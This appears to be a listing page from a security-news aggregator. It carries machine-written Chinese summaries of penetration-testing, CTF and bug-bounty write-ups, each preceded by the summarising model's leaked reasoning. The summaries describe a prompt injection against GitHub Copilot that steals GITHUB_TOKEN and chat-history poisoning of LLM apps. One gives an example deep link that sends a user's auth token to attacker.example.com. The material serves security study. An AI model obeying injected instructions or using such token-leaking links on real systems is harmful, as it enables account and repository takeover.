unSafe.sh - 不安全
我的收藏
今日热榜
公众号文章
导航
Github CVE
Github Tools
编码/解码
文件传输
Twitter Bot
Telegram Bot
Search
Rss
黑夜模式
Anatomy of a Cloud Native Attack: How We Pwned Kubernetes for $100k
嗯,用户让我用中文总结一篇文章,控制在100字以内,而且不需要特定的开头。首先,我需要仔细阅读文章内容,抓住主要点。文章讲的是一个安全漏洞利用链,从SSRF开始,然后利用EC2实例的元数据凭证,接着通过Kubelet API部署恶意pod,最后获取Service Account token,获得cluster-admin权限,并且负责任地披露漏洞,获得了10万美元的奖励。 好的,用户可能是一位网络安全从业者或者学生,想快速了解文章内容。他们可能需要简洁明了的总结,用于学习或分享。深层需求可能是希望了解漏洞利用的具体步骤和结果,而不仅仅是表面的信息。 接下来,我需要将这些要点浓缩到100字以内。要确保涵盖关键步骤:SSRF、元数据窃取、Kubelet滥用、恶意pod部署、权限提升和负责任披露。同时保持语言流畅自然。 最后检查一下字数和表达是否准确。确保没有遗漏重要信息,并且符合用户的要求。 </think> 研究人员通过发现一个简单的SSRF漏洞,利用云实例元数据窃取凭证,并通过Kubelet API部署恶意pod获取Service Account令牌,最终获得集群管理员权限。漏洞负责任披露后获得10万美元奖励。...
2026-2-27 05:2:39 | 阅读: 5 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
cloud
privileged
ssrf
tiny
payout
What Hackers Talk About at 2 AM: Using Dark Web Forums for Recon ️
好的,我现在需要帮用户总结这篇文章的内容,控制在100字以内。首先,我得仔细阅读文章,抓住主要信息。 文章开头描述了凌晨两点的情景,开发者还在工作,作者则在浏览一个看起来没更新过的论坛。接着提到一些高危漏洞并非来自工具,而是源于论坛上的闲聊和吹嘘。这说明暗网并非电影中的神秘黑客聚集地,而是混乱且充斥着骗局的地方,但其中也隐藏着真实的情报。 我需要把这些要点浓缩成一句话。重点包括时间点、作者的活动、漏洞来源以及暗网的实际情况。确保语言简洁明了,不使用开头的套话。 最后检查字数,确保不超过100字。这样用户就能快速了解文章的核心内容了。 </think> 凌晨两点,作者在浏览老旧论坛时发现高危漏洞往往源于网络闲聊而非工具;暗网并非神秘黑客聚集地,而是充斥骗局与ego contest的混乱空间,但其中隐藏着真实情报。...
2026-2-27 05:1:14 | 阅读: 9 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
developers
burp
hollywood
chaotic
aiat
What Hackers Talk About at 2 AM: Using Dark Web Forums for Recon ️
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户已经提供了文章的链接和内容,我先仔细阅读一下。 这篇文章主要讲述了一个开发者的深夜生活,他在凌晨两点还在处理代码问题。同时,他提到在论坛上发现了一些关于暗网的情报,攻击者在这些地方炫耀他们的成果,而这些信息有时甚至比安全工具检测到的还要早。 接下来,我需要提取关键点:开发者的深夜工作、论坛上的暗网情报、攻击者炫耀导致情报泄露。然后将这些内容简洁地整合成一段话,确保不超过100字,并且不使用特定的开头词。 最后检查一下是否涵盖了所有重要信息,并且语言流畅自然。 </think> 开发者凌晨修复代码时,在老旧论坛发现暗网情报,攻击者炫耀导致情报泄露。...
2026-2-27 05:1:14 | 阅读: 4 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
developers
cold
contests
cheap
pushing
RoguePilot: How a Passive Prompt Injection Led to GitHub Repository Takeovers
嗯,用户让我用中文总结一下这篇文章的内容,控制在一百个字以内,而且不需要以“文章内容总结”或者“这篇文章”这样的开头,直接写描述即可。好的,我先仔细读一下这篇文章。 文章主要讲的是GitHub Codespaces中的一个漏洞,叫做RoguePilot。这个漏洞允许攻击者通过被动提示注入技术,在开发者不知情的情况下劫持整个代码仓库。攻击者利用GitHub Issues中的隐藏指令,让GitHub Copilot执行恶意操作,最终窃取敏感的GITHUB_TOKEN。这个漏洞展示了AI工具集成到开发环境中的潜在安全风险。 接下来,我需要把内容浓缩到100字以内。重点包括:RoguePilot漏洞、被动提示注入、GitHub Copilot被利用、窃取GITHUB_TOKEN、导致仓库被完全控制。同时,还要提到修复措施和未来安全建议。 所以,总结的时候要涵盖这些要点:RoguePilot漏洞通过被动提示注入攻击GitHub Copilot,窃取令牌导致仓库被控制,强调AI工具带来的安全风险。 现在组织语言: 文章描述了GitHub Codespaces中的RoguePilot漏洞,该漏洞利用被动提示注入技术通过GitHub Copilot窃取GITHUB_TOKEN,导致代码仓库被完全控制。这凸显了AI工具集成到开发环境中的安全风险,并强调了加强防御措施的重要性。 检查一下字数:刚好在100字左右。 </think> 文章描述了GitHub Codespaces中的RoguePilot漏洞,该漏洞利用被动提示注入技术通过GitHub Copilot窃取GITHUB_TOKEN,导致代码仓库被完全控制。这凸显了AI工具集成到开发环境中的安全风险,并强调了加强防御措施的重要性。...
2026-2-27 04:59:57 | 阅读: 8 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
github
copilot
attacker
roguepilot
repository
THM — When Hearts Collide
好的,用户让我帮忙总结一篇文章,控制在100字以内,而且不需要特定的开头。我得先仔细看看这篇文章的内容。 文章主要讲的是RustScan这个工具,它是一个现代的端口扫描器。看起来作者用RustScan扫描了IP地址10.66.179.186,找到了开放的22号和80号端口。22是SSH,版本是OpenSSH 9.6p1;80是HTTP,但文章里没提到具体的服务版本。此外,作者还提到了一些警告信息,比如文件限制可能影响速度,建议使用Docker或者调整ulimit参数。 用户的需求很明确,就是简明扼要地总结内容。我需要抓住关键点:工具名称、扫描目标、发现的端口及服务、版本信息以及警告建议。同时要注意字数限制在100字以内。 现在把这些信息整合一下:RustScan扫描了某个IP,发现了两个开放端口及其服务和版本,并给出了性能优化的建议。这样应该就能满足用户的要求了。 </think> 文章描述了使用RustScan工具扫描IP地址10.66.179.186的过程,发现开放端口22(SSH)和80(HTTP),并提供了警告信息和优化建议。...
2026-2-27 04:58:59 | 阅读: 3 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
rustscan
179
hearts
186
ulimit
️How Anonymous LDAP Enumeration Led to AS-REP Roasting and Domain Compromise
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读这篇文章,了解它的主要内容和结构。 这篇文章看起来是关于渗透测试的,特别是针对Hack The Box上的Sauna机器。作者详细描述了他如何利用Active Directory的特性进行攻击,包括枚举、AS-REP烤面包攻击、DCSync权限获取以及最终的Pass-the-Hash攻击。他还提到了使用各种工具如nmap、windapsearch、GetNPUsers.py、evil-winrm和BloodHound。 接下来,我需要提炼出关键点:目标机器是一个银行应用,运行在Windows Server上;通过枚举员工名字生成用户名;利用AS-REP烤面包攻击获取密码哈希;通过WinRM访问系统;使用BloodHound分析权限;最终获取管理员权限并拿到flag。 然后,我要把这些点浓缩成一个连贯的句子,确保不超过100字,并且直接描述文章内容,不使用任何特定的开头词。 最后,检查一下是否涵盖了所有主要步骤和工具的使用,确保总结准确且简洁。 </think> 文章描述了一次针对Hack The Box上Sauna机器的渗透测试过程。通过枚举员工名字生成用户名格式,并利用AS-REP烤面包攻击获取用户密码哈希。随后通过WinRM访问系统并上传winPEAS进行本地枚举。发现svc_loanmgr账户后,进一步利用BloodHound分析权限关系,并最终通过DCSync权限获取管理员密码哈希,成功提权并获取目标flag。...
2026-2-27 04:49:27 | 阅读: 8 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
23t01
egotistical
local2026
commonlib
aclproc
THM — Corp Website
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内,并且不需要特定的开头。首先,我得仔细阅读用户提供的文章内容,了解其主要信息。 文章看起来像是一个CTF挑战的详细过程。开头提到情人节临近,Romance & Co公司被黑,用户作为安全分析师需要分析攻击过程。接着描述了使用Nmap扫描目标IP,发现开放端口22和3000。然后用FFuf扫描隐藏目录,没找到结果。接着检查源代码和使用的技术,使用Nuclei扫描发现高危漏洞CVE-2025-55184和关键漏洞CVE-2025-55182。 接下来是利用这些漏洞的过程:安装依赖、设置虚拟环境、运行exploit.py脚本获取用户权限,读取user.txt。然后进行权限提升,发现可以sudo运行Python3,最后通过reverse shell获取root权限并读取root.txt。 总结下来,文章描述了一个通过漏洞利用和权限提升来入侵系统的CTF挑战过程。我需要将这些关键点浓缩到100字以内。 首先确定主要步骤:漏洞发现、利用、用户权限获取、权限提升、root权限获取。每个步骤都要简明扼要地表达出来。 可能会用到的关键词:Nmap扫描、隐藏目录、Nuclei漏洞、命令注入、用户flag、sudo Python3、reverse shell、root flag。 现在组织语言:文章描述了一次CTF挑战,参与者通过Nmap和FFuf扫描目标服务器,使用Nuclei发现高危漏洞CVE-2025-55184和CVE-2025-55182。利用这些漏洞进行命令注入,获取用户权限并读取user.txt文件。随后通过sudo运行Python3提升权限,并建立reverse shell获得root访问权限,最终读取root.txt完成挑战。 检查字数是否在100字以内,并确保信息准确无误。 </think> 文章描述了一次CTF挑战中参与者通过扫描目标服务器发现漏洞(CVE-2025-55184和CVE-2025-55182),利用这些漏洞进行命令注入攻击以获取用户权限,并最终通过提权操作获得root访问权限的过程。...
2026-2-27 04:45:13 | 阅读: 16 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
security
prefetch
x20next
nuclei
woff2
Advent of Cyber Prep Track
嗯,用户让我帮忙总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”或者“这篇文章”这样的开头。直接写描述就行。好的,我先看看用户提供的文章内容。 文章是关于THM Cyber Advent 2025的挑战,特别是第一个挑战“密码混乱”。目标是创建一个符合系统检查且不在泄露列表中的密码。步骤包括至少12个字符,包含大小写、数字和符号,并确保不在 breach 数据库中。然后他们遇到了弱密码提示,需要修改。 所以,我需要把这些信息浓缩到100字以内。要涵盖挑战名称、目标、步骤和结果。可能的结构是:挑战名称、目标、步骤要求、遇到的问题和解决方法。 再想想用户可能的需求,他们可能是在准备参加类似的网络安全挑战,或者想了解如何创建强密码。所以总结的时候要突出关键点:密码长度、复杂度要求以及避免使用已泄露的密码。 确保语言简洁明了,直接描述内容,不使用多余的修饰词。比如:“THM Cyber Advent 2025的挑战一‘密码混乱’要求创建一个至少12字符、包含大小写、数字和符号且不在泄露列表中的强密码。” 这样既符合字数限制,又涵盖了所有重要信息。 </think> THM Cyber Advent 2025的挑战一“密码混乱”要求创建一个至少12字符、包含大小写、数字和符号且不在泄露列表中的强密码。...
2026-2-27 04:45:1 | 阅读: 2 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
advent
sizelet
sizefree
walkthrough
TryHackMe — All-in-One — 00 | Prerequisites
好的,我现在要帮用户总结一篇文章的内容,控制在100字以内。用户的要求很明确,不需要以“文章内容总结”这样的开头,直接写描述即可。 首先,我需要通读整篇文章,抓住主要内容。文章主要讲的是如何在TryHackMe平台上设置稳定的环境来解决挑战。作者使用了免费账户,详细介绍了注册、下载OpenVPN配置、连接到机器的步骤。此外,作者还分享了自己的配置流程,包括使用Windows作为主系统、Kali Linux VM运行工具、Burp Suite代理以及VPS进行SSH隧道连接,以绕过网络限制。 接下来,我要提炼这些信息,确保在100字以内涵盖主要点:注册、OpenVPN连接、配置流程和工具使用。同时,语言要简洁明了,避免冗余。 最后,检查字数是否符合要求,并确保内容准确无误地反映了文章的核心内容。 </think> 文章介绍了在TryHackMe平台上设置稳定环境的方法,包括注册、下载和连接OpenVPN配置、启动机器以及通过代理和SSH隧道访问受限资源的流程。...
2026-2-26 13:41:8 | 阅读: 8 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
tryhackme
machine
windows
openvpn
burp
Chat History Poisoning in LLM Applications: Persistent Prompt Injection via Untrusted JSON Context
嗯,用户让我总结一篇文章的内容,控制在一百个字以内,而且不需要特定的开头。首先,我需要仔细阅读这篇文章,理解它的主要观点。 文章讨论了大型语言模型(LLM)应用中的一个安全漏洞,叫做“聊天历史中毒”。作者指出,很多应用直接从客户端的JSON请求中获取聊天历史,而不是存储在安全的后端数据库里。这样就给了攻击者机会,他们可以篡改聊天记录,影响模型的行为。 接下来,文章举了一个例子,展示了如何通过修改JSON中的历史字段来插入虚假信息。然后还提到了几种缓解措施,比如将聊天历史存储在安全的数据库中、严格验证请求参数以及遵循OWASP的安全指南。 用户的要求是总结内容,并且控制在100字以内。所以我要抓住关键点:漏洞是什么、攻击方式、影响以及解决方案。 最后,我需要用简洁的语言把这些点整合起来,确保不超过字数限制,并且直接描述内容。 </think> 文章探讨了大型语言模型(LLM)应用中因从不安全的JSON输入获取聊天历史而引发的“聊天历史中毒”漏洞。攻击者可通过篡改JSON中的历史数据操纵LLM行为,例如插入虚假回复或执行受限命令。文章还提供了实验场景和缓解措施建议。...
2026-2-26 13:39:59 | 阅读: 11 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
llm
security
poisoning
injection
One-Click Account Takeover via Deep Link Token Auto-Append
嗯,这篇文章主要讲的是一个Android应用的漏洞。这个漏洞是通过深链接(deep link)来利用的。深链接允许外部来源打开应用内的特定页面或执行特定操作。文章中提到,这个应用在处理深链接时,没有对URL进行验证,导致攻击者可以构造一个恶意的深链接,让应用在WebView中加载攻击者的URL,并且自动附加上用户的认证令牌。 具体来说,攻击者可以构造一个像`android://Somequickcart?page=webview&objectType=https://attacker.example.com`的链接。当用户点击这个链接时,应用会打开WebView,并加载攻击者的URL。由于应用的设计缺陷,它会自动将用户的认证令牌作为查询参数附加到这个URL上,比如变成`https://attacker.example.com?tmp_param1=AUTH_TOKEN`。 这样,攻击者的服务器就能捕获到用户的认证令牌,从而接管用户的账户。文章还详细分析了漏洞的技术原因,包括深链接处理中没有URL验证、无条件附加认证令牌以及使用查询参数传输令牌这三个关键问题。 最后,文章提出了修复建议,包括在深链接处理中添加严格的URL白名单、有条件地附加认证令牌以及使用HTTP头或POST方法传输令牌等措施。 </think> 这篇文章描述了一个Android应用程序的漏洞,其中恶意构造的深度链接会导致WebView加载攻击者控制的URL,并自动附加用户的认证令牌作为查询参数。这种设计缺陷使得攻击者能够通过简单的点击完成账户接管。...
2026-2-26 13:39:27 | 阅读: 6 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
attacker
objecttype
param1
objectid
One-Click Account Takeover via Deep Link Token Auto-Append
好的,我需要帮助用户总结这篇文章的内容。用户的要求是用中文总结,控制在100字以内,并且不需要特定的开头。 首先,我快速浏览文章,发现它主要讲的是一个Android应用的安全漏洞。这个漏洞涉及到深度链接(deep links)和WebView组件。 文章提到,攻击者可以通过构造一个特殊的深度链接,让应用打开一个WebView,并自动附加用户的认证令牌。这会导致用户的敏感信息被泄露,从而被攻击者接管账户。 接下来,我需要提取关键点:深度链接的工作原理、漏洞如何被利用、以及攻击的影响。这些内容需要简洁明了地表达出来。 最后,确保总结控制在100字以内,并且语言流畅自然。 </think> 文章描述了一个Android应用的安全漏洞:通过构造恶意深度链接,攻击者可强制应用在WebView中加载任意URL,并自动附加用户的认证令牌作为查询参数。这导致用户敏感信息泄露,攻击者可借此接管账户。...
2026-2-26 13:39:27 | 阅读: 13 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
attacker
objecttype
param1
objectid
InfoSecPrep Box Proving grounds.
好,我现在要帮用户总结这篇文章的内容。首先,我需要仔细阅读文章,理解其主要步骤和结论。 文章讲的是渗透测试的过程,从信息收集开始。作者使用了nmap扫描,发现了两个开放端口:80和SSH。接着,他注意到80端口运行的是WordPress 5.4.2,可能存在漏洞。于是他使用wpscan工具进一步分析,找到了robots.txt文件,并在secrets目录下发现了一个Base64编码的文本。 解码后,他得到了一个OpenSSH私钥。通过设置权限并使用这个私钥,他成功以OSCP用户名SSH登录到目标机器。接下来,为了提升权限,他使用了Linpeas.sh工具,找到了bash和sudo作为提权的可能途径。最终,他成功获得了root权限,并提到了GTFOBins网站作为参考。 现在我需要将这些内容浓缩到100字以内。重点包括:nmap扫描、WordPress漏洞、wpscan工具、Base64解码、SSH登录、提权方法和成功结果。 最后,确保语言简洁明了,不使用任何开头的固定格式。 </think> 文章描述了一次渗透测试过程:通过nmap扫描发现目标机器的开放端口和运行服务(WordPress 5.4.2),利用wpscan工具发现robots.txt文件并获取Base64编码的私钥。解码后获得SSH私钥并成功登录系统。随后通过Linpeas.sh工具寻找提权方法,在bash或sudo配置错误的情况下成功获取root权限。...
2026-2-26 13:39:7 | 阅读: 7 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
ssh
gathering
robots
sizefound
machine
TryHackMe — All-in-One — 01 | Brooklyn Nine-Nine
嗯,用户让我总结一下这篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。我得先仔细读一下这篇文章,了解它的主要内容。 这篇文章讲的是一个CTF机器,名字叫Brooklyn Nine-Nine,是在TryHackMe上的。作者详细介绍了如何通过枚举服务、利用漏洞和提取隐藏信息来获取用户和root权限。主要用到了nmap、stegcracker、steghide等工具。最终通过两种方式获得了root权限:一种是利用less命令的提权,另一种是利用nano命令的提权。 我需要把这些关键点浓缩到100字以内。首先说明这是关于一个CTF机器的攻略,然后提到使用了哪些工具和方法,最后指出获取了用户和root权限,并且提到了两种提权方式。 可能的结构是:文章介绍了一个CTF机器Brooklyn Nine-Nine,通过nmap、stegcracker等工具进行枚举和服务分析,提取隐藏信息并利用漏洞获取用户和root权限。两种提权方法分别是利用less和nano工具。 这样应该能控制在100字左右,并且直接描述内容。 </think> 文章介绍了一个CTF机器“Brooklyn Nine-Nine”,通过使用nmap、stegcracker等工具进行服务枚举和漏洞分析,提取隐藏信息并最终获取用户和root权限。文章详细描述了利用`less`和`nano`命令实现提权的过程。...
2026-2-26 13:38:56 | 阅读: 6 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
nine
jake
holt
ssh
brookly
DC-1 Box, Proving Grounds
好的,我现在要帮用户总结这篇文章的内容。首先,我需要仔细阅读用户提供的文章内容,理解其中的主要步骤和关键点。 文章主要讲述了一次渗透测试的过程。作者从信息收集开始,使用nmap扫描目标,发现了一个开放的HTTP端口80。接着,他识别出这是一个Drupal CMS版本7的网站,并通过searchsploit找到了相关的漏洞利用。尝试其中一个漏洞后,成功获得了初始访问权限。 接下来,作者使用gobuster进行枚举,发现了admin页面。然后,他利用metasploit中的Drupal漏洞成功植入了shell。获得初始立足点后,作者进入了特权提升阶段,使用linpeas工具发现了可以利用的find命令来获取root权限。 总结下来,整个过程包括信息收集、漏洞利用、枚举、初始访问、特权提升和最终获取root权限。用户要求控制在100字以内,并且不需要特定的开头。 我需要将这些步骤简洁地表达出来,确保涵盖所有关键点:nmap扫描、Drupal漏洞利用、gobuster枚举、metasploit植入shell、linpeas特权提升以及最终的root访问。 现在组织语言:文章描述了一次渗透测试过程,使用nmap发现Drupal CMS漏洞并利用metasploit植入shell。随后通过gobuster枚举和linpeas工具实现特权提升,最终获得root权限。 这样应该符合用户的要求。 </think> 文章描述了一次渗透测试过程:通过nmap扫描发现目标网站使用Drupal CMS 7.x版本,并利用searchsploit找到相关漏洞。随后使用gobuster枚举Web目录并发现admin页面。通过Metasploit自动化exploit获取初始 foothold,并利用linpeas进行Privilege Escalation最终获得root权限。...
2026-2-26 13:38:30 | 阅读: 6 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
drupal
python
stories
nmap
12+ MUST Know Google Dorking Commands in 2026
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户的要求很明确,不需要用“文章内容总结”这样的开头,直接写描述即可。 首先,我仔细阅读了用户提供的文章。文章主要介绍了一种名为Google Dorking的技术,用于网络安全中的漏洞检测。作者列举了超过12种Google Dorking命令,包括查找管理面板、电子邮件列表、登录页面、LinkedIn资料、机密文件等。这些命令可以帮助安全专业人士进行侦察,发现潜在的安全漏洞。 接下来,我需要将这些信息浓缩到100字以内。重点包括:Google Dorking的定义、用途(如漏洞检测)、具体命令示例(如查找管理面板和电子邮件列表),以及强调这些命令仅用于学习目的。 在组织语言时,要确保简洁明了,同时涵盖所有关键点。例如:“文章介绍了Google Dorking技术及其在网络安全中的应用,列举了多种搜索命令用于识别漏洞和敏感信息,并强调其学习用途。” 最后,检查字数是否符合要求,并确保没有使用任何不必要的复杂术语,让用户能够轻松理解。 </think> 文章介绍了Google Dorking技术及其在网络安全中的应用,列举了多种搜索命令用于识别漏洞和敏感信息,并强调其学习用途。...
2026-2-26 13:38:19 | 阅读: 5 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
inurl
dorking
filetype
username
Jeeves Retired Box from Hackthebox
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。用户已经提供了文章内容,看起来是关于渗透测试的。首先,我得通读一下文章,抓住主要步骤。 文章开始提到使用ping和nmap进行信息收集,发现开放的端口。接着用metasploit检查SMB版本,发现漏洞CVE-2020-0796,但未能成功利用。然后通过ffuf工具找到web目录askjeeves,利用powershell下载nc.exe获取初始权限。 之后使用winpeas进行提权,发现 KeePass 数据库。用John the Ripper破解密码,获得管理员权限,并最终通过Pass-the-Hash技术获取系统控制权。 现在我需要把这些步骤浓缩到100字以内,确保涵盖关键点:信息收集、漏洞利用、初始访问、提权和最终控制。同时要避免使用“这篇文章”这样的开头。 可能的结构是:信息收集→漏洞尝试→web目录→获取权限→提权→最终控制。这样可以确保在字数限制内传达主要内容。 </think> 文章描述了一次针对Hackthebox退役靶机“Jeeves”的渗透测试过程。通过信息收集、漏洞利用、初始访问和权限提升等步骤,最终成功获取系统控制权。...
2026-2-22 15:1:51 | 阅读: 13 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
powershell
database
foothold
python
keepass
How Domain Enumeration, Content Discovery, Leaked Secrets, and Service URLs Converge into…
嗯,用户让我总结一篇文章的内容,控制在100字以内,而且不需要用“文章内容总结”之类的开头。看起来用户可能是在做研究或者写报告,需要简洁明了的摘要。 首先,我需要通读整篇文章,抓住主要观点。文章讨论了网络攻击中的侦察技术,比如子域名枚举、内容发现、搜索引擎技巧等。作者强调这些技术如何相互结合,形成完整的攻击链。 然后,文章提到了五个不同的路径(Path A到E),每个路径展示了如何从不同的侦察技术逐步进入目标系统。例如,Path A从子域名开始,发现Swagger文件,进而找到GitHub上的.env文件,最终获得API访问权限。 作者还指出,大多数资源只教授孤立的技术,而忽略了它们之间的联系。这篇文章填补了这一知识空白,展示了如何将这些技术串联起来进行攻击。 最后,文章讨论了防御方需要采取的措施,如持续监控、凭证暴露监测、云存储管理等。这表明攻击和防御是一个持续的过程。 总结起来,文章的核心是侦察技术的整合应用及其对实际攻击的影响。我需要用简洁的语言概括这些要点。 </think> 本文探讨了网络攻击中的侦察技术及其在实际目标中的应用。通过结合子域名枚举、内容发现、短链接暴露等方法,攻击者可以逐步揭示目标的漏洞并实现初始访问。文章强调了不同技术之间的关联性,并展示了如何通过链式步骤将信息泄露转化为实际操作路径。...
2026-2-22 14:57:33 | 阅读: 19 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
cloud
subdomain
stealer
staging
postman
Step-by-Step Guide to Setting Up a Cybersecurity Home Lab (Kali Linux + VirtualBox)
好的,我现在需要帮用户总结一篇文章的内容,控制在100字以内。首先,我得仔细阅读用户提供的文章内容,理解其主要目的和步骤。 文章讲的是如何使用VirtualBox作为虚拟主机,Kali Linux作为虚拟机来搭建一个网络安全实验室。作者的目标是创建一个安全、隔离的环境,用于练习和提升实际操作技能,而不需要触碰真实的生产系统。 接下来,我需要提取关键信息:项目目标、使用的工具(VirtualBox和Kali Linux)、搭建过程的步骤以及作者的意图。然后,把这些信息浓缩成简短的描述,确保不超过100字,并且直接描述内容,不使用“总结”或“这篇文章”这样的开头。 最后,检查语言是否简洁明了,确保信息准确传达。 </think> 该项目旨在通过VirtualBox作为虚拟主机和Kali Linux作为虚拟机搭建网络安全实验室,提供安全隔离的实践环境以提升动手技能。...
2026-2-22 14:57:28 | 阅读: 9 |
收藏
|
InfoSec Write-ups - Medium - infosecwriteups.com
virtualbox
hostkali
yours
isolated
How I Bought a $1400 Jacket for Free Using a Business Logic Flaw
好的,我现在要帮用户总结这篇文章的内容。用户的要求是用中文,控制在100字以内,不需要特定的开头,直接写描述即可。首先,我需要仔细阅读文章内容,抓住关键点。 文章讲的是一个电子商务平台的安全漏洞,特别是业务逻辑上的问题。作者发现可以通过滥用优惠券来免费购买商品。具体来说,新客户优惠券和新闻简报注册优惠券可以叠加使用,导致商品价格变为零。这说明平台没有正确验证多个优惠券的使用情况。 接下来,我需要将这些信息浓缩到100字以内。要确保涵盖主要漏洞、如何利用以及影响。同时,语言要简洁明了,不使用复杂的术语。 可能会这样组织:电子商务平台存在业务逻辑漏洞,允许滥用优惠券叠加使用导致商品免费购买。这说明平台未能正确验证多个优惠券的应用情况。 检查一下字数是否在限制内,并确保信息准确传达。 </think> 电子商务平台存在业务逻辑漏洞,允许滥用优惠券叠加使用导致商品免费购买。这说明平台未能正确验证多个优惠券的应用情况。...
2026-2-22 14:57:14 | 阅读: 8 |
收藏
|
Bug Bounty in InfoSec Write-ups on Medium - infosecwriteups.com
coupon
jacket
discount
leather
discounts
Previous
9
10
11
12
13
14
15
16
Next